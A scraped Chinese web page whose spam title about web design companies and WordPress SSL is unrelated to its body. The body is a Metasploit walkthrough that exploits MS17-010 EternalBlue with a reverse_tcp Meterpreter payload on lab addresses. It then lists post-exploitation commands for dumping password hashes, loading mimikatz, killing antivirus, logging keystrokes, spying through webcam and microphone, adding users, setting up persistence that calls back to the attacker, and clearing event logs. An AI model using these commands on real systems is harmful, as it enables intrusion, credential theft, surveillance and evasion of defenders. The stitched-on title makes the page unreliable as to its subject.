网站制作公司前景wordpress如何添加ssl证书
- 作者: 五速梦信息网
- 时间: 2026年03月21日 07:20
当前位置: 首页 > news >正文
网站制作公司前景,wordpress如何添加ssl证书,微信指数是搜索量吗,中学生免费作文网站一、更新MSF apt update # 更新安装包信息#xff1b;只检查#xff0c;不更新#xff08;已安装的软件包是否有可用的更新#xff0c;给出汇总报告#xff09; apt upgrade # 更新已安装的软件包#xff0c;不删除旧包#xff1b; apt full-upgrade # 升级包#x…一、更新MSF apt update # 更新安装包信息只检查不更新已安装的软件包是否有可用的更新给出汇总报告 apt upgrade # 更新已安装的软件包不删除旧包 apt full-upgrade # 升级包删除旧包 二、使用方法 使用方法 1. 基础使用msfconsole #进入框架search ms17_010 # 使用search命令查找相关漏洞use exploit/windows/smb/ms17_010_eternalblue # 使用use进入模块info #使用info查看模块信息set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷show options #查看模块需要配置的参数set RHOST 192.168.100.158 #设置参数exploit / run #攻击 后渗透阶段 #后渗透阶段 二、Payload 攻击载荷(payload) PayloadPayload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码而在Metasploit中Payload是一种特殊模块它们能够以漏洞利用模块运行并能够利用目标系统中的安全漏洞实施攻击。简而言之这种漏洞利用模块可以访问目标系统而其中的代码定义了Payload在目标系统中的行为。 ShellcodeShellcode是payload中的精髓部分在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下目标系统执行了shellcode这一组指令之后才会提供一个命令行shell。 简单来说就是当你成功攻入他人电脑后要做的操作 payload模块路径 /usr/share/metasploit-framework/modules/payloads Metasploit中的 Payload 模块主要有以下三种类型Single 是一种完全独立的Payload而且使用起来就像运行calc.exe一样简单例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的因此它们有可能会被类似netcat这样的非metasploit处理工具所捕捉到。 Stager 这种Payload 负责建立目标用户与攻击者之间的网络连接并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp它可以让目标系统与攻击者建立一条 tcp 连接让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp它可以让目标系统开启一个tcp监听器而攻击者随时可以与目标系统进行通信(正向连接)。 Stage 是Stager Payload下的一种Payload组件这种Payload可以提供更加高级的功能而且没有大小限制。 三、Meterpreter Meterpreter属于stage payload在Metasploit Framework中Meterpreter是一种后渗透工具它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 Meterpreter的特点 Meterpreter完全驻留在内存没有写入到磁盘。 Meterpreter注入的时候不会产生新的进程并可以很容易的移植到其它正在运行的进程。 默认情况下 Meterpreter的通信是加密的所以很安全。 扩展性许多新的特征模块可以被加载。 我们在设置payloads 时可以将payloads设置为windows/meterpreter/reverse_tcp 然后获得了meterpreter之后我们就可以干很多事了具体做的事在我们下面的后渗透阶段都有讲 四、漏洞利用(exploit) 漏洞利用exploit也就是我们常说的exp他就是对漏洞进行攻击的代码。 exploit漏洞利用模块路径(这里面有针对不同平台的exploit) /usr/share/metasploit-framework/modules/exploits 五、永恒之蓝 接下来将会尝试使用以一下永恒之蓝这个漏洞 msfconsole #输入这个命令主要是进入msf渗透框架中 search ms17_010 #利用search命令搜索漏洞相关利用模块这个就是找漏洞的利用方式 可见前三个为攻击工具第四个为探测工具。 利用Auxiliary辅助探测模块对漏洞进行探测 Auxiliary辅助探测模块 该模块不会直接在攻击机和靶机之间建立访问它们只负责执行扫描嗅探指纹识别等相关功能以辅助渗透测试。 use 3 \3是其编号 show options #查看这个模块需要配置的信息 设置要探测的远程目标注RHOSTS 参数是要探测主机的ip或ip范围我们探测一个ip范围内的主机是否存在漏洞 set rhosts 192.168.154.140 注意一定要在同一网段下 扫描一个范围也是可以的我这里是一个确定的靶机就只扫描这个靶机了 exploit //开始扫描 扫描出其445端口并没有这个漏洞没事掏出我的win7试试这个是win10估计漏洞修复了 成功扫出 查看这个漏洞的信息 命令 info 查看这个漏洞的信息 查看可攻击的系统平台显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统show targets 使用Exploit漏洞利用模块对漏洞进行利用 1、选择漏洞攻击模块对漏洞进行利用 命令 use exploit/windows/smb/ms17_010_eternalblue Payload攻击载荷模块 攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码成功渗透目标后用于在目标系统上运行任意命令。 show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payload 设置攻击载荷 set payload windows/x64/meterpreter/reverse_tcp 这样的设置是针对win系统x64位的 show options set RHOST 192.168.154.136 #设置RHOST也就是要攻击主机的ipset LHOST 192.168.154.139 #设置LHOST也就是我们主机的ip用于接收从目标机弹回来的shellset lport 6666 #设置lport也就是我们主机的端口反弹shell到这个端口如果我们这里不设置lport的话默认是4444端口监听 修改完毕尝试攻击 exploit 六、后渗透阶段 运行了exploit命令之后我们开启了一个reverse TCP监听器来监听本地的6666端口即我攻击者的本地主机地址LHOST和端口号LPORT。运行成功之后我们将会看到命令提示符 meterpreter 出现如上图 Meterpreter ? 核心命令 命令 说明 ——- ———— ? 帮助菜单 background 把当前会话挂到后台运行 bg background命令的别名 bgkill 杀死后台meterpreter 脚本 bglist 列出正在运行的后台脚本 bgrun 执行一个meterpreter脚本作为后台线程 channel 显示信息或控制活动频道 close 关闭一个频道 detach 分离Meterpreter会话用于 http/https disable_unicode_encoding 禁用 unicode 字符串的编码 enable_unicode_encoding 启用 unicode 字符串的编码 exit 终止 Meterpreter 会话 get_timeouts 获取当前会话超时值 guid 获取会话 GUID help 帮助菜单 info 显示有关 Post 模块的信息 irb 在当前会话中打开一个交互式 Ruby shell load 加载一个或多个 Meterpreter 扩展 machine_id 获取连接到会话的机器的 MSF ID migrate 将服务器迁移到另一个进程 pivot 管理枢轴侦听器 pry 在当前会话上打开 Pry 调试器 quit 终止 Meterpreter 会话 read 从通道读取数据 resource 运行存储在文件中的命令 run 执行一个 Meterpreter 脚本或 Post 模块 secure 重新协商会话上的 TLV 数据包加密 sessions 快速切换到另一个会话 set_timeouts 设置当前会话超时值 sleep 强制 Meterpreter 安静然后重新建立会话 ssl_verify 修改 SSL 证书验证设置 transport 管理运输机制 use 不推荐使用的load命令别名 uuid 获取当前会话的 UUID write 将数据写入通道 Stdapi文件系统命令 命令 说明 ——- ———— cat 将文件内容读到屏幕上 cd 切换目录 checksum 检索文件的校验和 cp 将源复制到目标 del 删除指定文件 dir 列出文件ls 的别名 download 下载文件或目录 edit 编辑文件 getlwd 打印本地工作目录 getwd 打印工作目录 lcd 更改本地工作目录 lls 列出本地文件 lpwd 打印本地工作目录 ls 列出文件 mkdir 制作目录 mv 将源移动到目标 pwd 打印工作目录 rm 删除指定文件 rmdir 删除目录 search 搜索文件 show_mount 列出所有挂载点/逻辑驱动器 upload 上传文件或目录 Stdapi网络命令 命令 说明 ——- ———— arp 显示主机 ARP 缓存 getproxy 显示当前代理配置 ifconfig 显示界面 ipconfig 显示接口 netstat 显示网络连接 portfwd 将本地端口转发到远程服务 resolve 解析目标上的一组主机名 route 查看和修改路由表 Stdapi系统命令 命令 说明 ——- ———— clearev 清除事件日志 drop_token 放弃任何活动的模拟令牌。 execute 执行命令 getenv 获取一个或多个环境变量值 getpid 获取当前进程标识符 getprivs 尝试启用当前进程可用的所有权限 getid 获取服务器运行的用户的 SID getuid 获取服务器运行的用户 kill 终止进程 localtime 显示目标系统本地日期和时间 pgrep 按名称过滤进程 pkill 按名称终止进程 ps 列出正在运行的进程 reboot 重启远程计算机 reg 修改远程注册表并与之交互 rev2self 在远程机器上调用 RevertToSelf() shell 放入系统命令 shell shutdown 关闭远程计算机 steal_token 尝试从目标进程窃取模拟令牌 suspend 暂停或恢复进程列表 sysinfo 获取有关远程系统的信息例如 OS Stdapi用户界面命令 命令 说明 ——- ———— enumdesktops 列出所有可访问的桌面和窗口站 getdesktop 获取当前的meterpreter桌面 idletime 返回远程用户空闲的秒数 keyboard_send 发送击键 keyevent 发送按键事件 keyscan_dump 转储击键缓冲区 keyscan_start 开始捕获击键 keyscan_stop 停止捕获击键 mouse 发送鼠标事件 screenshare 实时观看远程用户桌面 screenshot 抓取交互式桌面的截图 setdesktop 更改meterpreters当前桌面 uictl 控制一些用户界面组件 Stdapi网络摄像头命令 命令 说明 ——- ———— record_mic 从默认麦克风录制音频 X 秒 webcam_chat 开始视频聊天 webcam_list 列出网络摄像头 webcam_snap 从指定的网络摄像头拍摄快照 webcam_stream 从指定的网络摄像头播放视频流 Stdapi音频输出命令 命令 说明 ——- ———— play 在目标系统上播放波形音频文件 (.wav) Priv权限提升命令 命令 说明 ——- ———— getsystem 尝试将您的权限提升到本地系统的权限。 Priv密码数据库命令 命令 说明 ——- ———— hashdump 转储 SAM 数据库的内容 PrivTimestomp 命令 命令 说明 ——- ———— timestomp 操作文件 MACE 属性 meterpreter 以上基本就是大部分常用的命令了 下面让我们来使用一下 我们输入 shell即可切换到目标主机的windows cmd_shell里面 命令 shell #获取目标主机的cmd_shell权限chcp 65001 #这里为了避免目标主机cmd_shell字符乱码设置目标主机命令行的字符编码65001是UTF-8 要想从目标主机shell退出到meterpreter 我们只需输入exit 从meterpreter退出到MSF框架: 命令 background #把我们获得的meterpreter会话挂载到后台运行 查看前面获得的meterpreter_shell会话最前面的数字是会话的id 命令 sessions -l #查看获得的meterpreter_shell会话列表 输入sessions [id号]即可进入相应的meterpreter_shell中 输入shell即可进入 cmd 类型的控制再输入powershell即可进入 powershell 类型的控制台 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 run hashdump #导出密码的哈希 load kiwi #加载mimikatz ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下 getpid #查看当前Meterpreter Shell的进程PID migrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权,获得的当前用户是administrator才能成功 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u test1 -p Abc123456 #创建test1用户密码为Abc123456 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 run exploit/windows/local/persistence lhost192.168.100.132 lport8888 #会自动连接192.168.100.132的8888端口缺点是容易被杀毒软件查杀 portfwd add -l 9999 -r 192.168.100.158 -p 3389 #将192.168.11.13的3389端口转发到本地的9999端口上这里的192.168.100.158是获取权限的主机的ip地址 clearev #清除日志 目前就了解到这里吧这两天太累了真难崩 一句励志语依旧奉上 “每一步努力都是为未来铺路相信自己你能创造奇迹”
相关文章
-
网站制作公司前景wordpress菜单icon
网站制作公司前景wordpress菜单icon
- 技术栈
- 2026年03月21日
-
网站制作公司排名企业做网站找谁
网站制作公司排名企业做网站找谁
- 技术栈
- 2026年03月21日
-
网站制作公司哪里好上海专业网站建设维护
网站制作公司哪里好上海专业网站建设维护
- 技术栈
- 2026年03月21日
-
网站制作公司网站建设公司网络规划设计师教程第2版pdf
网站制作公司网站建设公司网络规划设计师教程第2版pdf
- 技术栈
- 2026年03月21日
-
网站制作公司网站建设网站假网站怎么做
网站制作公司网站建设网站假网站怎么做
- 技术栈
- 2026年03月21日
-
网站制作公司违法微信怎么建小网站
网站制作公司违法微信怎么建小网站
- 技术栈
- 2026年03月21日
